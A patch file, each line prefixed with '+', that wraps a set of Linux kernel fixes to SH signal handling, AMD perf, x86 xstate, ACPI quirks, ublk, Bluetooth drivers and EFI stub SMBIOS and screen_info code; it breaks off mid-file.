+diff --git a/arch/sh/include/asm/processor_32.h b/arch/sh/include/asm/processor_32.h
+index 27aebf1e75a20..3ef7adf739c83 100644
+--- a/arch/sh/include/asm/processor_32.h
++++ b/arch/sh/include/asm/processor_32.h
+@@ -50,6 +50,7 @@
+ #define SR_FD		0x00008000
+ #define SR_MD		0x40000000
+ 
++#define SR_USER_MASK	0x00000303	// M, Q, S, T bits
+ /*
+  * DSP structure and data
+  */
+diff --git a/arch/sh/kernel/signal_32.c b/arch/sh/kernel/signal_32.c
+index 90f495d35db29..a6bfc6f374911 100644
+--- a/arch/sh/kernel/signal_32.c
++++ b/arch/sh/kernel/signal_32.c
+@@ -115,6 +115,7 @@ static int
+ restore_sigcontext(struct pt_regs *regs, struct sigcontext __user *sc, int *r0_p)
+ {
+ 	unsigned int err = 0;
++	unsigned int sr = regs->sr & ~SR_USER_MASK;
+ 
+ #define COPY(x)		err |= __get_user(regs->x, &sc->sc_##x)
+ 			COPY(regs[1]);
+@@ -130,6 +131,8 @@ restore_sigcontext(struct pt_regs *regs, struct sigcontext __user *sc, int *r0_p
+ 	COPY(sr);	COPY(pc);
+ #undef COPY
+ 
++	regs->sr = (regs->sr & SR_USER_MASK) | sr;
++
+ #ifdef CONFIG_SH_FPU
+ 	if (boot_cpu_data.flags & CPU_HAS_FPU) {
+ 		int owned_fp;
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index 4386b10682ce4..8ca5e827f30b2 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -923,6 +923,7 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 
+ 		/* Event overflow */
+ 		handled++;
++		status &= ~mask;
+ 		perf_sample_data_init(&data, 0, hwc->last_period);
+ 
+ 		if (!x86_perf_event_set_period(event))
+@@ -935,8 +936,6 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 
+ 		if (perf_event_overflow(event, &data, regs))
+ 			x86_pmu_stop(event, 0);
+-
+-		status &= ~mask;
+ 	}
+ 
+ 	/*
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 714166cc25f2f..0bab497c94369 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -1118,21 +1118,20 @@ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 	zerofrom = offsetof(struct xregs_state, extended_state_area);
+ 
+ 	/*
+-	 * The ptrace buffer is in non-compacted XSAVE format.  In
+-	 * non-compacted format disabled features still occupy state space,
+-	 * but there is no state to copy from in the compacted
+-	 * init_fpstate. The gap tracking will zero these states.
+-	 */
+-	mask = fpstate->user_xfeatures;
+-
+-	/*
+-	 * Dynamic features are not present in init_fpstate. When they are
+-	 * in an all zeros init state, remove those from 'mask' to zero
+-	 * those features in the user buffer instead of retrieving them
+-	 * from init_fpstate.
++	 * This 'mask' indicates which states to copy from fpstate.
++	 * Those extended states that are not present in fpstate are
++	 * either disabled or initialized:
++	 *
++	 * In non-compacted format, disabled features still occupy
++	 * state space but there is no state to copy from in the
++	 * compacted init_fpstate. The gap tracking will zero these
++	 * states.
++	 *
++	 * The extended features have an all zeroes init state. Thus,
++	 * remove them from 'mask' to zero those features in the user
++	 * buffer instead of retrieving them from init_fpstate.
+ 	 */
+-	if (fpu_state_size_dynamic())
+-		mask &= (header.xfeatures | xinit->header.xcomp_bv);
++	mask = header.xfeatures;
+ 
+ 	for_each_extended_xfeature(i, mask) {
+ 		/*
+@@ -1151,9 +1150,8 @@ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 			pkru.pkru = pkru_val;
+ 			membuf_write(&to, &pkru, sizeof(pkru));
+ 		} else {
+-			copy_feature(header.xfeatures & BIT_ULL(i), &to,
++			membuf_write(&to,
+ 				     __raw_xsave_addr(xsave, i),
+-				     __raw_xsave_addr(xinit, i),
+ 				     xstate_sizes[i]);
+ 		}
+ 		/*
+diff --git a/arch/x86/mm/cpu_entry_area.c b/arch/x86/mm/cpu_entry_area.c
+index 7316a82242599..e91500a809639 100644
+--- a/arch/x86/mm/cpu_entry_area.c
++++ b/arch/x86/mm/cpu_entry_area.c
+@@ -10,6 +10,7 @@
+ #include <asm/fixmap.h>
+ #include <asm/desc.h>
+ #include <asm/kasan.h>
++#include <asm/setup.h>
+ 
+ static DEFINE_PER_CPU_PAGE_ALIGNED(struct entry_stack_page, entry_stack_storage);
+ 
+@@ -29,6 +30,12 @@ static __init void init_cea_offsets(void)
+ 	unsigned int max_cea;
+ 	unsigned int i, j;
+ 
++	if (!kaslr_enabled()) {
++		for_each_possible_cpu(i)
++			per_cpu(_cea_offset, i) = i;
++		return;
++	}
++
+ 	max_cea = (CPU_ENTRY_AREA_MAP_SIZE - PAGE_SIZE) / CPU_ENTRY_AREA_SIZE;
+ 
+ 	/* O(sodding terrible) */
+diff --git a/drivers/acpi/x86/s2idle.c b/drivers/acpi/x86/s2idle.c
+index c7afce465a071..e499c60c45791 100644
+--- a/drivers/acpi/x86/s2idle.c
++++ b/drivers/acpi/x86/s2idle.c
+@@ -384,29 +384,6 @@ static const struct acpi_device_id amd_hid_ids[] = {
+ 	{}
+ };
+ 
+-static int lps0_prefer_amd(const struct dmi_system_id *id)
+-{
+-	pr_debug("Using AMD GUID w/ _REV 2.\n");
+-	rev_id = 2;
+-	return 0;
+-}
+-static const struct dmi_system_id s2idle_dmi_table[] __initconst = {
+-	{
+-		/*
+-		 * AMD Rembrandt based HP EliteBook 835/845/865 G9
+-		 * Contains specialized AML in AMD/_REV 2 path to avoid
+-		 * triggering a bug in Qualcomm WLAN firmware. This may be
+-		 * removed in the future if that firmware is fixed.
+-		 */
+-		.callback = lps0_prefer_amd,
+-		.matches = {
+-			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
+-			DMI_MATCH(DMI_BOARD_NAME, "8990"),
+-		},
+-	},
+-	{}
+-};
+-
+ static int lps0_device_attach(struct acpi_device *adev,
+ 			      const struct acpi_device_id *not_used)
+ {
+@@ -586,7 +563,6 @@ static const struct platform_s2idle_ops acpi_s2idle_ops_lps0 = {
+ 
+ void __init acpi_s2idle_setup(void)
+ {
+-	dmi_check_system(s2idle_dmi_table);
+ 	acpi_scan_add_handler(&lps0_handler);
+ 	s2idle_set_ops(&acpi_s2idle_ops_lps0);
+ }
+diff --git a/drivers/acpi/x86/utils.c b/drivers/acpi/x86/utils.c
+index 4e816bb402f68..e45285d4e62a4 100644
+--- a/drivers/acpi/x86/utils.c
++++ b/drivers/acpi/x86/utils.c
+@@ -200,39 +200,28 @@ bool acpi_device_override_status(struct acpi_device *adev, unsigned long long *s
+  * a hardcoded allowlist for D3 support, which was used for these platforms.
+  *
+  * This allows quirking on Linux in a similar fashion.
++ *
++ * Cezanne systems shouldn't *normally* need this as the BIOS includes
++ * StorageD3Enable.  But for two reasons we have added it.
++ * 1) The BIOS on a number of Dell systems have ambiguity
++ *    between the same value used for _ADR on ACPI nodes GPP1.DEV0 and GPP1.NVME.
++ *    GPP1.NVME is needed to get StorageD3Enable node set properly.
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=216440
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=216773
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=217003
++ * 2) On at least one HP system StorageD3Enable is missing on the second NVME
++      disk in the system.
+  */
+ static const struct x86_cpu_id storage_d3_cpu_ids[] = {
+ 	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 96, NULL),	/* Renoir */
+ 	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 104, NULL),	/* Lucienne */
+-	{}
+-};
+-
+-static const struct dmi_system_id force_storage_d3_dmi[] = {
+-	{
+-		/*
+-		 * _ADR is ambiguous between GPP1.DEV0 and GPP1.NVME
+-		 * but .NVME is needed to get StorageD3Enable node
+-		 * https://bugzilla.kernel.org/show_bug.cgi?id=216440
+-		 */
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Inspiron 14 7425 2-in-1"),
+-		}
+-	},
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Inspiron 16 5625"),
+-		}
+-	},
++	X86_MATCH_VENDOR_FAM_MODEL(AMD, 25, 80, NULL),	/* Cezanne */
+ 	{}
+ };
+ 
+ bool force_storage_d3(void)
+ {
+-	const struct dmi_system_id *dmi_id = dmi_first_match(force_storage_d3_dmi);
+-
+-	return dmi_id || x86_match_cpu(storage_d3_cpu_ids);
++	return x86_match_cpu(storage_d3_cpu_ids);
+ }
+ 
+ /*
+diff --git a/drivers/atm/idt77252.c b/drivers/atm/idt77252.c
+index eec0cc2144e02..e327a0229dc17 100644
+--- a/drivers/atm/idt77252.c
++++ b/drivers/atm/idt77252.c
+@@ -2909,6 +2909,7 @@ close_card_oam(struct idt77252_dev *card)
+ 
+ 				recycle_rx_pool_skb(card, &vc->rcv.rx_pool);
+ 			}
++			kfree(vc);
+ 		}
+ 	}
+ }
+@@ -2952,6 +2953,15 @@ open_card_ubr0(struct idt77252_dev *card)
+ 	return 0;
+ }
+ 
++static void
++close_card_ubr0(struct idt77252_dev *card)
++{
++	struct vc_map *vc = card->vcs[0];
++
++	free_scq(card, vc->scq);
++	kfree(vc);
++}
++
+ static int
+ idt77252_dev_open(struct idt77252_dev *card)
+ {
+@@ -3001,6 +3011,7 @@ static void idt77252_dev_close(struct atm_dev *dev)
+ 	struct idt77252_dev *card = dev->dev_data;
+ 	u32 conf;
+ 
++	close_card_ubr0(card);
+ 	close_card_oam(card);
+ 
+ 	conf = SAR_CFG_RXPTH |	/* enable receive path           */
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 4aec9be0ab77e..22a790d512842 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -656,7 +656,8 @@ static void __ublk_fail_req(struct ublk_queue *ubq, struct ublk_io *io,
+ 	}
+ }
+ 
+-static void ubq_complete_io_cmd(struct ublk_io *io, int res)
++static void ubq_complete_io_cmd(struct ublk_io *io, int res,
++				unsigned issue_flags)
+ {
+ 	/* mark this cmd owned by ublksrv */
+ 	io->flags |= UBLK_IO_FLAG_OWNED_BY_SRV;
+@@ -668,7 +669,7 @@ static void ubq_complete_io_cmd(struct ublk_io *io, int res)
+ 	io->flags &= ~UBLK_IO_FLAG_ACTIVE;
+ 
+ 	/* tell ublksrv one io request is coming */
+-	io_uring_cmd_done(io->cmd, res, 0);
++	io_uring_cmd_done(io->cmd, res, 0, issue_flags);
+ }
+ 
+ #define UBLK_REQUEUE_DELAY_MS	3
+@@ -685,7 +686,8 @@ static inline void __ublk_abort_rq(struct ublk_queue *ubq,
+ 	mod_delayed_work(system_wq, &ubq->dev->monitor_work, 0);
+ }
+ 
+-static inline void __ublk_rq_task_work(struct request *req)
++static inline void __ublk_rq_task_work(struct request *req,
++				       unsigned issue_flags)
+ {
+ 	struct ublk_queue *ubq = req->mq_hctx->driver_data;
+ 	int tag = req->tag;
+@@ -723,7 +725,7 @@ static inline void __ublk_rq_task_work(struct request *req)
+ 			pr_devel("%s: need get data. op %d, qid %d tag %d io_flags %x\n",
+ 					__func__, io->cmd->cmd_op, ubq->q_id,
+ 					req->tag, io->flags);
+-			ubq_complete_io_cmd(io, UBLK_IO_RES_NEED_GET_DATA);
++			ubq_complete_io_cmd(io, UBLK_IO_RES_NEED_GET_DATA, issue_flags);
+ 			return;
+ 		}
+ 		/*
+@@ -761,17 +763,18 @@ static inline void __ublk_rq_task_work(struct request *req)
+ 			mapped_bytes >> 9;
+ 	}
+ 
+-	ubq_complete_io_cmd(io, UBLK_IO_RES_OK);
++	ubq_complete_io_cmd(io, UBLK_IO_RES_OK, issue_flags);
+ }
+ 
+-static inline void ublk_forward_io_cmds(struct ublk_queue *ubq)
++static inline void ublk_forward_io_cmds(struct ublk_queue *ubq,
++					unsigned issue_flags)
+ {
+ 	struct llist_node *io_cmds = llist_del_all(&ubq->io_cmds);
+ 	struct ublk_rq_data *data, *tmp;
+ 
+ 	io_cmds = llist_reverse_order(io_cmds);
+ 	llist_for_each_entry_safe(data, tmp, io_cmds, node)
+-		__ublk_rq_task_work(blk_mq_rq_from_pdu(data));
++		__ublk_rq_task_work(blk_mq_rq_from_pdu(data), issue_flags);
+ }
+ 
+ static inline void ublk_abort_io_cmds(struct ublk_queue *ubq)
+@@ -783,12 +786,12 @@ static inline void ublk_abort_io_cmds(struct ublk_queue *ubq)
+ 		__ublk_abort_rq(ubq, blk_mq_rq_from_pdu(data));
+ }
+ 
+-static void ublk_rq_task_work_cb(struct io_uring_cmd *cmd)
++static void ublk_rq_task_work_cb(struct io_uring_cmd *cmd, unsigned issue_flags)
+ {
+ 	struct ublk_uring_cmd_pdu *pdu = ublk_get_uring_cmd_pdu(cmd);
+ 	struct ublk_queue *ubq = pdu->ubq;
+ 
+-	ublk_forward_io_cmds(ubq);
++	ublk_forward_io_cmds(ubq, issue_flags);
+ }
+ 
+ static void ublk_rq_task_work_fn(struct callback_head *work)
+@@ -797,8 +800,9 @@ static void ublk_rq_task_work_fn(struct callback_head *work)
+ 			struct ublk_rq_data, work);
+ 	struct request *req = blk_mq_rq_from_pdu(data);
+ 	struct ublk_queue *ubq = req->mq_hctx->driver_data;
++	unsigned issue_flags = IO_URING_F_UNLOCKED;
+ 
+-	ublk_forward_io_cmds(ubq);
++	ublk_forward_io_cmds(ubq, issue_flags);
+ }
+ 
+ static void ublk_queue_cmd(struct ublk_queue *ubq, struct request *rq)
+@@ -1052,7 +1056,8 @@ static void ublk_cancel_queue(struct ublk_queue *ubq)
+ 		struct ublk_io *io = &ubq->ios[i];
+ 
+ 		if (io->flags & UBLK_IO_FLAG_ACTIVE)
+-			io_uring_cmd_done(io->cmd, UBLK_IO_RES_ABORT, 0);
++			io_uring_cmd_done(io->cmd, UBLK_IO_RES_ABORT, 0,
++						IO_URING_F_UNLOCKED);
+ 	}
+ 
+ 	/* all io commands are canceled */
+@@ -1295,7 +1300,7 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	return -EIOCBQUEUED;
+ 
+  out:
+-	io_uring_cmd_done(cmd, ret, 0);
++	io_uring_cmd_done(cmd, ret, 0, issue_flags);
+ 	pr_devel("%s: complete: cmd op %d, tag %d ret %x io_flags %x\n",
+ 			__func__, cmd_op, tag, ret, io->flags);
+ 	return -EIOCBQUEUED;
+@@ -2053,7 +2058,7 @@ static int ublk_ctrl_uring_cmd(struct io_uring_cmd *cmd,
+ 		break;
+ 	}
+  out:
+-	io_uring_cmd_done(cmd, ret, 0);
++	io_uring_cmd_done(cmd, ret, 0, issue_flags);
+ 	pr_devel("%s: cmd done ret %d cmd_op %x, dev id %d qid %d\n",
+ 			__func__, ret, cmd->cmd_op, header->dev_id, header->queue_id);
+ 	return -EIOCBQUEUED;
+diff --git a/drivers/bluetooth/btqcomsmd.c b/drivers/bluetooth/btqcomsmd.c
+index 2acb719e596f5..11c7e04bf3947 100644
+--- a/drivers/bluetooth/btqcomsmd.c
++++ b/drivers/bluetooth/btqcomsmd.c
+@@ -122,6 +122,21 @@ static int btqcomsmd_setup(struct hci_dev *hdev)
+ 	return 0;
+ }
+ 
++static int btqcomsmd_set_bdaddr(struct hci_dev *hdev, const bdaddr_t *bdaddr)
++{
++	int ret;
++
++	ret = qca_set_bdaddr_rome(hdev, bdaddr);
++	if (ret)
++		return ret;
++
++	/* The firmware stops responding for a while after setting the bdaddr,
++	 * causing timeouts for subsequent commands. Sleep a bit to avoid this.
++	 */
++	usleep_range(1000, 10000);
++	return 0;
++}
++
+ static int btqcomsmd_probe(struct platform_device *pdev)
+ {
+ 	struct btqcomsmd *btq;
+@@ -162,7 +177,7 @@ static int btqcomsmd_probe(struct platform_device *pdev)
+ 	hdev->close = btqcomsmd_close;
+ 	hdev->send = btqcomsmd_send;
+ 	hdev->setup = btqcomsmd_setup;
+-	hdev->set_bdaddr = qca_set_bdaddr_rome;
++	hdev->set_bdaddr = btqcomsmd_set_bdaddr;
+ 
+ 	ret = hci_register_dev(hdev);
+ 	if (ret < 0)
+diff --git a/drivers/bluetooth/btsdio.c b/drivers/bluetooth/btsdio.c
+index 795be33f2892d..02893600db390 100644
+--- a/drivers/bluetooth/btsdio.c
++++ b/drivers/bluetooth/btsdio.c
+@@ -354,6 +354,7 @@ static void btsdio_remove(struct sdio_func *func)
+ 
+ 	BT_DBG("func %p", func);
+ 
++	cancel_work_sync(&data->work);
+ 	if (!data)
+ 		return;
+ 
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 18bc947187115..5c536151ef836 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -1050,21 +1050,11 @@ static int btusb_recv_bulk(struct btusb_data *data, void *buffer, int count)
+ 		hci_skb_expect(skb) -= len;
+ 
+ 		if (skb->len == HCI_ACL_HDR_SIZE) {
+-			__u16 handle = __le16_to_cpu(hci_acl_hdr(skb)->handle);
+ 			__le16 dlen = hci_acl_hdr(skb)->dlen;
+-			__u8 type;
+ 
+ 			/* Complete ACL header */
+ 			hci_skb_expect(skb) = __le16_to_cpu(dlen);
+ 
+-			/* Detect if ISO packet has been sent over bulk */
+-			if (hci_conn_num(data->hdev, ISO_LINK)) {
+-				type = hci_conn_lookup_type(data->hdev,
+-							    hci_handle(handle));
+-				if (type == ISO_LINK)
+-					hci_skb_pkt_type(skb) = HCI_ISODATA_PKT;
+-			}
+-
+ 			if (skb_tailroom(skb) < hci_skb_expect(skb)) {
+ 				kfree_skb(skb);
+ 				skb = NULL;
+diff --git a/drivers/bus/imx-weim.c b/drivers/bus/imx-weim.c
+index 828c66bbaa676..55d917bd1f3f8 100644
+--- a/drivers/bus/imx-weim.c
++++ b/drivers/bus/imx-weim.c
+@@ -204,8 +204,8 @@ static int weim_parse_dt(struct platform_device *pdev)
+ 	const struct of_device_id *of_id = of_match_device(weim_id_table,
+ 							   &pdev->dev);
+ 	const struct imx_weim_devtype *devtype = of_id->data;
++	int ret = 0, have_child = 0;
+ 	struct device_node *child;
+-	int ret, have_child = 0;
+ 	struct weim_priv *priv;
+ 	void __iomem *base;
+ 	u32 reg;
+diff --git a/drivers/char/random.c b/drivers/char/random.c
+index ce3ccd172cc86..253f2ddb89130 100644
+--- a/drivers/char/random.c
++++ b/drivers/char/random.c
+@@ -1311,7 +1311,7 @@ static void __cold try_to_generate_entropy(void)
+ 			/* Basic CPU round-robin, which avoids the current CPU. */
+ 			do {
+ 				cpu = cpumask_next(cpu, &timer_cpus);
+-				if (cpu == nr_cpumask_bits)
++				if (cpu >= nr_cpu_ids)
+ 					cpu = cpumask_first(&timer_cpus);
+ 			} while (cpu == smp_processor_id() && num_cpus > 1);
+ 
+diff --git a/drivers/firmware/arm_scmi/mailbox.c b/drivers/firmware/arm_scmi/mailbox.c
+index 1e40cb035044d..a455f3c0e98b2 100644
+--- a/drivers/firmware/arm_scmi/mailbox.c
++++ b/drivers/firmware/arm_scmi/mailbox.c
+@@ -52,6 +52,39 @@ static bool mailbox_chan_available(struct device *dev, int idx)
+ 					   "#mbox-cells", idx, NULL);
+ }
+ 
++static int mailbox_chan_validate(struct device *cdev)
++{
++	int num_mb, num_sh, ret = 0;
++	struct device_node *np = cdev->of_node;
++
++	num_mb = of_count_phandle_with_args(np, "mboxes", "#mbox-cells");
++	num_sh = of_count_phandle_with_args(np, "shmem", NULL);
++	/* Bail out if mboxes and shmem descriptors are inconsistent */
++	if (num_mb <= 0 || num_sh > 2 || num_mb != num_sh) {
++		dev_warn(cdev, "Invalid channel descriptor for '%s'\n",
++			 of_node_full_name(np));
++		return -EINVAL;
++	}
++
++	if (num_sh > 1) {
++		struct device_node *np_tx, *np_rx;
++
++		np_tx = of_parse_phandle(np, "shmem", 0);
++		np_rx = of_parse_phandle(np, "shmem", 1);
++		/* SCMI Tx and Rx shared mem areas have to be distinct */
++		if (!np_tx || !np_rx || np_tx == np_rx) {
++			dev_warn(cdev, "Invalid shmem descriptor for '%s'\n",
++				 of_node_full_name(np));
++			ret = -EINVAL;
++		}
++
++		of_node_put(np_tx);
++		of_node_put(np_rx);
++	}
++
++	return ret;
++}
++
+ static int mailbox_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 			      bool tx)
+ {
+@@ -64,6 +97,10 @@ static int mailbox_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 	resource_size_t size;
+ 	struct resource res;
+ 
++	ret = mailbox_chan_validate(cdev);
++	if (ret)
++		return ret;
++
+ 	smbox = devm_kzalloc(dev, sizeof(*smbox), GFP_KERNEL);
+ 	if (!smbox)
+ 		return -ENOMEM;
+diff --git a/drivers/firmware/efi/earlycon.c b/drivers/firmware/efi/earlycon.c
+index 4d6c5327471ac..1bc6328646944 100644
+--- a/drivers/firmware/efi/earlycon.c
++++ b/drivers/firmware/efi/earlycon.c
+@@ -204,6 +204,14 @@ efi_earlycon_write(struct console *con, const char *str, unsigned int num)
+ 	}
+ }
+ 
++static bool __initdata fb_probed;
++
++void __init efi_earlycon_reprobe(void)
++{
++	if (fb_probed)
++		setup_earlycon("efifb");
++}
++
+ static int __init efi_earlycon_setup(struct earlycon_device *device,
+ 				     const char *opt)
+ {
+@@ -211,15 +219,17 @@ static int __init efi_earlycon_setup(struct earlycon_device *device,
+ 	u16 xres, yres;
+ 	u32 i;
+ 
+-	if (screen_info.orig_video_isVGA != VIDEO_TYPE_EFI)
++	fb_wb = opt && !strcmp(opt, "ram");
++
++	if (screen_info.orig_video_isVGA != VIDEO_TYPE_EFI) {
++		fb_probed = true;
+ 		return -ENODEV;
++	}
+ 
+ 	fb_base = screen_info.lfb_base;
+ 	if (screen_info.capabilities & VIDEO_CAPABILITY_64BIT_BASE)
+ 		fb_base |= (u64)screen_info.ext_lfb_base << 32;
+ 
+-	fb_wb = opt && !strcmp(opt, "ram");
+-
+ 	si = &screen_info;
+ 	xres = si->lfb_width;
+ 	yres = si->lfb_height;
+diff --git a/drivers/firmware/efi/efi-init.c b/drivers/firmware/efi/efi-init.c
+index 1639159493e3e..5cb7fb4549f0c 100644
+--- a/drivers/firmware/efi/efi-init.c
++++ b/drivers/firmware/efi/efi-init.c
+@@ -72,6 +72,9 @@ static void __init init_screen_info(void)
+ 		if (memblock_is_map_memory(screen_info.lfb_base))
+ 			memblock_mark_nomap(screen_info.lfb_base,
+ 					    screen_info.lfb_size);
++
++		if (IS_ENABLED(CONFIG_EFI_EARLYCON))
++			efi_earlycon_reprobe();
+ 	}
+ }
+ 
+diff --git a/drivers/firmware/efi/libstub/arm64-stub.c b/drivers/firmware/efi/libstub/arm64-stub.c
+index 7327b98d8e3fe..7c502dafe6f91 100644
+--- a/drivers/firmware/efi/libstub/arm64-stub.c
++++ b/drivers/firmware/efi/libstub/arm64-stub.c
+@@ -85,8 +85,10 @@ efi_status_t handle_kernel_image(unsigned long *image_addr,
+ 		}
+ 	}
+ 
+-	if (image->image_base != _text)
++	if (image->image_base != _text) {
+ 		efi_err("FIRMWARE BUG: efi_loaded_image_t::image_base has bogus value\n");
++		image->image_base = _text;
++	}
+ 
+ 	if (!IS_ALIGNED((u64)_text, SEGMENT_ALIGN))
+ 		efi_err("FIRMWARE BUG: kernel image not aligned on %dk boundary\n",
+diff --git a/drivers/firmware/efi/libstub/arm64.c b/drivers/firmware/efi/libstub/arm64.c
+index 4501652e11ab6..84d94443c601d 100644
+--- a/drivers/firmware/efi/libstub/arm64.c
++++ b/drivers/firmware/efi/libstub/arm64.c
+@@ -16,20 +16,43 @@
+ 
+ static bool system_needs_vamap(void)
+ {
+-	const u8 *type1_family = efi_get_smbios_string(1, family);
++	const struct efi_smbios_type4_record *record;
++	const u32 __aligned(1) *socid;
++	const u8 *version;
+ 
+ 	/*
+ 	 * Ampere eMAG, Altra, and Altra Max machines crash in SetTime() if
+-	 * SetVirtualAddressMap() has not been called prior.
++	 * SetVirtualAddressMap() has not been called prior. Most Altra systems
++	 * can be identified by the SMCCC soc ID, which is conveniently exposed
++	 * via the type 4 SMBIOS records. Otherwise, test the processor version
++	 * field. eMAG systems all appear to have the processor version field
++	 * set to "eMAG".
+ 	 */
+-	if (!type1_family || (
+-	    strcmp(type1_family, "eMAG") &&
+-	    strcmp(type1_family, "Altra") &&
+-	    strcmp(type1_family, "Altra Max")))
++	record = (struct efi_smbios_type4_record *)efi_get_smbios_record(4);
++	if (!record)
+ 		return false;
+ 
+-	efi_warn("Working around broken SetVirtualAddressMap()\n");
+-	return true;
++	socid = (u32 *)record->processor_id;
++	switch (*socid & 0xffff000f) {
++		static char const altra[] = "Ampere(TM) Altra(TM) Processor";
++		static char const emag[] = "eMAG";
++
++	default:
++		version = efi_get_smbios_string(&record->header, 4,
++						processor_version);
++		if (!version || (strncmp(version, altra, sizeof(altra) - 1) &&
++				 strncmp(version, emag, sizeof(emag) - 1)))
++			break;
++
++		fallthrough;
++
++	case 0x0a160001:	// Altra
++	case 0x0a160002:	// Altra Max
++		efi_warn("Working around broken SetVirtualAddressMap()\n");
++		return true;
++	}
++
++	return false;
+ }
+ 
+ efi_status_t check_platform_features(void)
+diff --git a/drivers/firmware/efi/libstub/efi-stub-entry.c b/drivers/firmware/efi/libstub/efi-stub-entry.c
+index 5245c4f031c0a..cc4dcaea67fa6 100644
+--- a/drivers/firmware/efi/libstub/efi-stub-entry.c
++++ b/drivers/firmware/efi/libstub/efi-stub-entry.c
+@@ -5,6 +5,15 @@
+ 
+ #include "efistub.h"
+ 
++static unsigned long screen_info_offset;
++
++struct screen_info *alloc_screen_info(void)
++{
++	if (IS_ENABLED(CONFIG_ARM))
++		return __alloc_screen_info();
++	return (void *)&screen_info + screen_info_offset;
++}
++
+ /*
+  * EFI entry point for the generic EFI stub used by ARM, arm64, RISC-V and
+  * LoongArch. This is the entrypoint that is described in the PE/COFF header
+@@ -56,6 +65,8 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 		return status;
+ 	}
+ 
++	screen_info_offset = image_addr - (unsigned long)image->image_base;
++
+ 	status = efi_stub_common(handle, image, image_addr, cmdline_ptr);
+ 
+ 	efi_free(image_size, image_addr);
+diff --git a/drivers/firmware/efi/libstub/efi-stub.c b/drivers/firmware/efi/libstub/efi-stub.c
+index 2955c1ac6a36e..f9c1e8a2bd1d3 100644
+--- a/drivers/firmware/efi/libstub/efi-stub.c
++++ b/drivers/firmware/efi/libstub/efi-stub.c
+@@ -47,11 +47,6 @@
+ static u64 virtmap_base = EFI_RT_VIRTUAL_BASE;
+ static bool flat_va_mapping = (EFI_RT_VIRTUAL_OFFSET != 0);
+ 
+-struct screen_info * __weak alloc_screen_info(void)
+-{
+-	return &screen_info;
+-}
+-
+ void __weak free_screen_info(struct screen_info *si)
+ {
+ }
+diff --git a/drivers/firmware/efi/libstub/efistub.h b/drivers/firmware/efi/libstub/efistub.h
+index 5b8f2c411ed82..1926644b43dea 100644
+--- a/drivers/firmware/efi/libstub/efistub.h
++++ b/drivers/firmware/efi/libstub/efistub.h
+@@ -1042,6 +1042,7 @@ efi_enable_reset_attack_mitigation(void) { }
+ void efi_retrieve_tpm2_eventlog(void);
+ 
+ struct screen_info *alloc_screen_info(void);
++struct screen_info *__alloc_screen_info(void);
+ void free_screen_info(struct screen_info *si);
+ 
+ void efi_cache_sync_image(unsigned long image_base,
+@@ -1054,6 +1055,8 @@ struct efi_smbios_record {
+ 	u16	handle;
+ };
+ 
++const struct efi_smbios_record *efi_get_smbios_record(u8 type);
++
+ struct efi_smbios_type1_record {
+ 	struct efi_smbios_record	header;
+ 
+@@ -1067,13 +1070,46 @@ struct efi_smbios_type1_record {
+ 	u8				family;
+ };
+ 
+-#define efi_get_smbios_string(__type, __name) ({			\
++struct efi_smbios_type4_record {
++	struct efi_smbios_record	header;
++
++	u8				socket;
++	u8				processor_type;
++	u8				processor_family;
++	u8				processor_manufacturer;
++	u8				processor_id[8];
++	u8				processor_version;
++	u8				voltage;
++	u16				external_clock;
++	u16				max_speed;
++	u16				current_speed;
++	u8				status;
++	u8				processor_upgrade;
++	u16				l1_cache_handle;
++	u16				l2_cache_handle;
++	u16				l3_cache_handle;
++	u8				serial_number;
++	u8				asset_tag;
++	u8				part_number;
++	u8				core_count;
++	u8				enabled_core_count;
++	u8				thread_count;
++	u16				processor_characteristics;
++	u16				processor_family2;
++	u16				core_count2;
++	u16				enabled_core_count2;
++	u16				thread_count2;
++	u16				thread_enabled;
++};
++
++#define efi_get_smbios_string(__record, __type, __name) ({		\
+ 	int size = sizeof(struct efi_smbios_type ## __type ## _record);	\
+ 	int off = offsetof(struct efi_smbios_type ## __type ## _record,	\
+ 			   __name);					\
+-	__efi_get_smbios_string(__type, off, size);			\
++	__efi_get_smbios_string((__record), __type, off, size);		\
+ })
+ 
+-const u8 *__efi_get_smbios_string(u8 type, int offset, int recsize);
++const u8 *__efi_get_smbios_string(const struct efi_smbios_record *record,
++				  u8 type, int offset, int recsize);
+ 
+ #endif
+diff --git a/drivers/firmware/efi/libstub/screen_info.c b/drivers/firmware/efi/libstub/screen_info.c
+index 8e76a8b384ba1..4be1c4d1f922b 100644
+--- a/drivers/firmware/efi/libstub/screen_info.c
++++ b/drivers/firmware/efi/libstub/screen_info.c
+@@ -15,18 +15,11 @@
+  * early, but it only works if the EFI stub is part of the core kernel image
+  * itself. The zboot decompressor can only use the configuration table
+  * approach.
+- *
